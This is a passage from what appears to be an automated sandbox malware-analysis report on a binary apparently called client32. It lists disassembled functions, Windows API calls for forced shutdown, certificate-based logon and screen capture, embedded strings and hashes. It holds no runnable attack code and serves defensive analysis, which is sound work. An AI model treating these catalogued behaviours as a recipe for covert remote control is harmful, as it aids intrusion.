                                                                                                                                                                • Instruction Fuzzy Hash: 9622A5B5A40719AFE714DFB4CC85FEAF7B9BB48308F0045A9E16A97680DB74A940CF50
                                                                                                                                                                Function 1102D330 Relevance: 70.6, APIs: 21, Strings: 19, Instructions: 575sleepfileshutdownCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • InterlockedIncrement.KERNEL32(111ED4B8), ref: 1102D382
                                                                                                                                                                • Sleep.KERNEL32(0000EA60), ref: 1102D3A5
                                                                                                                                                                  • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000501,1102D590,00000000), ref: 11026F72
                                                                                                                                                                  • Part of subcall function 11026F20: Sleep.KERNEL32(00000032,?,1102D590,00000001), ref: 11026F76
                                                                                                                                                                  • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 11026F97
                                                                                                                                                                  • Part of subcall function 11026F20: WaitForSingleObject.KERNEL32(00000000,00000032,?,1102D590,00000001), ref: 11026FA2
                                                                                                                                                                  • Part of subcall function 11026F20: CloseHandle.KERNEL32(00000000,1102E392,?,1102D590,00000001), ref: 11026FB4
                                                                                                                                                                  • Part of subcall function 11026F20: FreeLibrary.KERNEL32(00000000,00000000,00000000,1102E392,?,1102D590,00000001), ref: 11026FE1
                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000020,00000000,00000000), ref: 1102D3AB
                                                                                                                                                                • SetPriorityClass.KERNEL32(00000000), ref: 1102D3B2
                                                                                                                                                                • SetEvent.KERNEL32(00000270), ref: 1102D3E7
                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 1102D4D8
                                                                                                                                                                • PostThreadMessageA.USER32(00001CF4,00000000,00000000,00000000), ref: 1102D5BC
                                                                                                                                                                • CloseHandle.KERNEL32(0000029C), ref: 1102D815
                                                                                                                                                                • _free.LIBCMT ref: 1102D825
                                                                                                                                                                • _free.LIBCMT ref: 1102D841
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1102D8D4
                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 1102D8E1
                                                                                                                                                                • _memset.LIBCMT ref: 1102D983
                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 1102D99B
                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,00000000,00000000), ref: 1102D9C2
                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 1102D9C9
                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 1102DAB7
                                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 1102DABE
                                                                                                                                                                • ExitWindowsEx.USER32(00000006,00000000), ref: 1102DAD4
                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 1102DAE0
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 1102DAF4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$File$CloseExitFindMessagePostThread$HandleProcessWindows_free$AttributesClassCurrentEventFirstFreeIncrementInterlockedLibraryModuleNameNextObjectPrioritySingleWait_memset
                                                                                                                                                                • String ID: *.*$562258$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Error. Multiple Terminate. $Finished terminate$HookDirectSound$Stop tracing, almost terminated$TermUI...$Termed$Terminate Client32 (err=%d)$Unload Hook$Warning. Unprocessed notify NC_CMD, cmd=%d$Warning. Unprocessed notify, type=%d$delete gMain.ev$deleted ipc$pSlash$remove smartcard devices
                                                                                                                                                                • API String ID: 2369127096-1985248231
                                                                                                                                                                • Opcode ID: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                                                                                                • Instruction ID: 7f46233fb5632011b045e2eff7fc4cb47a6b13c38cfe1b2a85386abe64dfbaee
                                                                                                                                                                • Opcode Fuzzy Hash: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                                                                                                • Instruction Fuzzy Hash: D212F778E001229FDB16DFE8CCC4E6DF7A6AB8470CFA401A9E52557644EB71BD80CB52
                                                                                                                                                                Function 110AD570 Relevance: 65.2, APIs: 22, Strings: 15, Instructions: 402libraryloaderencryptionCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110AC830: LoadLibraryA.KERNEL32(Crypt32.dll,00000000,?,110AD605,59FD48C0,?,?,?,?,1118484B,000000FF,?,110F4601,00000000,00000000,?), ref: 110AC870
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(00000000,CertCreateCertificateContext), ref: 110AC88C
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(00000000,CertFreeCertificateContext), ref: 110AC899
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CertGetNameStringA), ref: 110AC8A6
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CertGetValidUsages), ref: 110AC8B3
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(00000000,CertOpenStore), ref: 110AC8C0
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CertOpenSystemStoreA), ref: 110AC8CD
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CertCloseStore), ref: 110AC8DA
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(00000000,CertAddCertificateContextToStore), ref: 110AC8E7
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CertAddEncodedCertificateToStore), ref: 110AC8F4
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CertSetCertificateContextProperty), ref: 110AC901
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(00000000,CertGetCertificateContextProperty), ref: 110AC90E
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CryptAcquireCertificatePrivateKey), ref: 110AC91B
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CertEnumCertificatesInStore), ref: 110AC928
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(00000000,CertGetEnhancedKeyUsage), ref: 110AC935
                                                                                                                                                                • GetModuleHandleA.KERNEL32(Advapi32.dll,59FD48C0,?,?,?,?,1118484B,000000FF,?,110F4601,00000000,00000000,?,?,?,FFFFFFFF), ref: 110AD69E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CredMarshalCredentialA), ref: 110AD6B0
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CredFree), ref: 110AD6C8
                                                                                                                                                                • GetLastError.KERNEL32(?,110F4601,00000000,00000000,?,?,?,FFFFFFFF), ref: 110AD71C
                                                                                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000,59FD48C0,?,?,?,?,1118484B,000000FF,?,110F4601,00000000,00000000,?,?,?), ref: 110ADAC2
                                                                                                                                                                • SetLastError.KERNEL32(00000057,59FD48C0,?,?,?,?,1118484B,000000FF,?,110F4601,00000000,00000000,?,?,?,FFFFFFFF), ref: 110ADB0C
                                                                                                                                                                • FreeLibrary.KERNEL32(?,59FD48C0,?,?,?,?,1118484B,000000FF,?,110F4601,00000000,00000000,?,?,?,FFFFFFFF), ref: 110ADB1D
                                                                                                                                                                Strings
                                                                                                                                                                • CertGetCertificateContextProperty (1) failed (%d), xrefs: 110AD934
                                                                                                                                                                • \\.\%s\, xrefs: 110AD736
                                                                                                                                                                • LogonUserWithCert - CredMarshalCredential FAILED (%d), xrefs: 110ADA60
                                                                                                                                                                • LogonUserWithCert - Crypt32.dll NOT found!!!, xrefs: 110AD630
                                                                                                                                                                • AttemptLogon FAILED [status: 0x%08x], xrefs: 110ADA3D
                                                                                                                                                                • CredMarshalCredentialA, xrefs: 110AD6A4
                                                                                                                                                                • LogonUserWithCert - Advapi32.dll does NOT provide required functionality!, xrefs: 110ADA6A
                                                                                                                                                                • CertGetCertificateContextProperty (3) FAILED (%d), xrefs: 110AD9B6
                                                                                                                                                                • CredFree, xrefs: 110AD6BC
                                                                                                                                                                • LogonUserWithCert - Crypt32.dll does NOT provide required functionality!, xrefs: 110ADA7E
                                                                                                                                                                • LogonUserWithCert FAILED (%d) , xrefs: 110ADAFA
                                                                                                                                                                • Advapi32.dll, xrefs: 110AD699
                                                                                                                                                                • CertAddCertificateContextToStore FAILED (%d), xrefs: 110AD8FC
                                                                                                                                                                • CryptGetProvParam FAILED (%d), xrefs: 110AD864, 110AD8BB
                                                                                                                                                                • CertGetCertificateContextProperty (2) FAILED (%d), xrefs: 110AD97B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$ErrorLastLibrary$ContextCryptFreeHandleLoadModuleRelease
                                                                                                                                                                • String ID: Advapi32.dll$AttemptLogon FAILED [status: 0x%08x]$CertAddCertificateContextToStore FAILED (%d)$CertGetCertificateContextProperty (1) failed (%d)$CertGetCertificateContextProperty (2) FAILED (%d)$CertGetCertificateContextProperty (3) FAILED (%d)$CredFree$CredMarshalCredentialA$CryptGetProvParam FAILED (%d)$LogonUserWithCert - Advapi32.dll does NOT provide required functionality!$LogonUserWithCert - CredMarshalCredential FAILED (%d)$LogonUserWithCert - Crypt32.dll NOT found!!!$LogonUserWithCert - Crypt32.dll does NOT provide required functionality!$LogonUserWithCert FAILED (%d) $\\.\%s\
                                                                                                                                                                • API String ID: 455412317-1640292549
                                                                                                                                                                • Opcode ID: 0a3a4b21b94d378845317c105dbd61d75b4cf44ee77677e94ff4052ff1f6a984
                                                                                                                                                                • Instruction ID: 97a68900379f189f4888b360d1aa769602a48b8a546b4f3faf74fcf061f0f1c6
                                                                                                                                                                • Opcode Fuzzy Hash: 0a3a4b21b94d378845317c105dbd61d75b4cf44ee77677e94ff4052ff1f6a984
                                                                                                                                                                • Instruction Fuzzy Hash: 8CE182B9D0416AAFDB20DFA0DC94AEEB7B8AB08758F0445E9F519A3250D7305F84CF61
                                                                                                                                                                Function 11113290 Relevance: 44.0, APIs: 29, Instructions: 470windowsleepkeyboardCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • IsIconic.USER32(?), ref: 111132BA
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1111332E
                                                                                                                                                                • CreateRectRgn.GDI32(00000000,?,?,?), ref: 11113352
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 11113402
                                                                                                                                                                • SetStretchBltMode.GDI32(?,00000004), ref: 11113534
                                                                                                                                                                • CreateRectRgn.GDI32(?,?,?,?), ref: 1111358F
                                                                                                                                                                • GetClipRgn.GDI32(?,00000000), ref: 111135A3
                                                                                                                                                                • OffsetRgn.GDI32(00000000,00000000,00000000), ref: 111135C8
                                                                                                                                                                • GetRgnBox.GDI32(00000000,?), ref: 111135D3
                                                                                                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 111135E1
                                                                                                                                                                • StretchBlt.GDI32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1111366B
                                                                                                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 1111367A
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11113684
                                                                                                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00CC0020), ref: 111136C2
                                                                                                                                                                • GetWindowOrgEx.GDI32(?,?), ref: 111136D7
                                                                                                                                                                • StretchBlt.GDI32(?,?,?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1111371C
                                                                                                                                                                • GetKeyState.USER32(000000A3), ref: 11113747
                                                                                                                                                                • CreatePen.GDI32(00000000,00000001,000000FF), ref: 1111378B
                                                                                                                                                                • CreatePen.GDI32(00000000,00000001,00FFFFFF), ref: 1111379D
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 111137B1
                                                                                                                                                                • Polyline.GDI32(00000000,?,00000005), ref: 111137C7
                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 111137CF
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 111137E0
                                                                                                                                                                • Polyline.GDI32(00000000,?,00000005), ref: 111137F3
                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 111137FB
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 1111380C
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11113816
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11113820
                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,00004000,?,?,00000000,00000000,00CC0020), ref: 11113845
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Object$Select$CreateStretch$ClipDeleteRect$PolylineSleep$ClientCountIconicModeOffsetStateTickWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 879653699-0
                                                                                                                                                                • Opcode ID: d401745ce30a04a168751c86834ada46f257f5b09613656bfb34517905d94607
                                                                                                                                                                • Instruction ID: 189fb298e01def9bf465b0ce988e90e2b94731e78913cb033f8d66d61a6768cc
                                                                                                                                                                • Opcode Fuzzy Hash: d401745ce30a04a168751c86834ada46f257f5b09613656bfb34517905d94607
                                                                                                                                                                • Instruction Fuzzy Hash: E112F7B1A147099FDB14CFB8C984AAEF7F9EF88315F10452DE55A9B258DB70A841CF10
                                                                                                                                                                Function 110254A0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 384windowtimeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetMenu.USER32(?), ref: 11025637
                                                                                                                                                                • DrawMenuBar.USER32(?), ref: 1102564E
                                                                                                                                                                • GetMenu.USER32(?), ref: 110256A3
                                                                                                                                                                • DeleteMenu.USER32(00000000,00000001,00000400), ref: 110256B1
                                                                                                                                                                • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1102560E
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • UpdateWindow.USER32(?), ref: 110256F7
                                                                                                                                                                • IsIconic.USER32(?), ref: 1102570A
                                                                                                                                                                • SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 1102572A
                                                                                                                                                                • KillTimer.USER32(00000000,00000000,00000080,00000002), ref: 11025790
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$TimerWindow$DeleteDrawErrorExitIconicKillLastMessageProcessUpdatewsprintf
                                                                                                                                                                • String ID: ..\ctl32\chatw.cpp$Chat$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 3085788722-363603473
                                                                                                                                                                • Opcode ID: f15b31b09d6730742c8f3530f633c1eaf3e2e501aa0880703a951233f58358ed
                                                                                                                                                                • Instruction ID: f097ee6c6ab1d2536d1fd0b1bb7039a4e68c359c164a3241977e36a4c1c69446
                                                                                                                                                                • Opcode Fuzzy Hash: f15b31b09d6730742c8f3530f633c1eaf3e2e501aa0880703a951233f58358ed
                                                                                                                                                                • Instruction Fuzzy Hash: 5DD19F74B40701ABE714DBA4CC95FAEB3E5AB88708F104518F6169F3C1DAB1F941CB95
                                                                                                                                                                Function 1103B160 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 196fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103B1B2
                                                                                                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 1103B1D9
                                                                                                                                                                  • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 1103B23A
                                                                                                                                                                • _sprintf.LIBCMT ref: 1103B2BB
                                                                                                                                                                • _fputs.LIBCMT ref: 1103B330
                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 1103B3A1
                                                                                                                                                                • _free.LIBCMT ref: 1103B336
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 1103B3DF
                                                                                                                                                                  • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$AttributesExitProcess$DeleteErrorFolderLastMessageNamePathUser__strdup_fputs_free_sprintf_strrchrwsprintf
                                                                                                                                                                • String ID: %05d$IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                • API String ID: 383231468-3762817415
                                                                                                                                                                • Opcode ID: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                                                                                                • Instruction ID: bb1b01960f0c7610cbc3075388277e5ec166904b02cd10daef8a33cd2ba906d0
                                                                                                                                                                • Opcode Fuzzy Hash: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                                                                                                • Instruction Fuzzy Hash: 7A71A235D4462AAFDB15CB64CC54FEEB3B4AF54308F0442D8E819A7284EB71AA44CFA0
                                                                                                                                                                Function 110CB2B0 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 168windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 110CB339
                                                                                                                                                                • IsIconic.USER32(00000001), ref: 110CB349
                                                                                                                                                                • GetClientRect.USER32(00000001,?), ref: 110CB358
                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 110CB36D
                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 110CB374
                                                                                                                                                                • IsIconic.USER32(00000001), ref: 110CB3A4
                                                                                                                                                                • GetWindowRect.USER32(00000001,?), ref: 110CB3B3
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,11185BBB,00000000,00000000,0000001D,00000000,?,00000001,?,00000002,?,?), ref: 110CB467
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
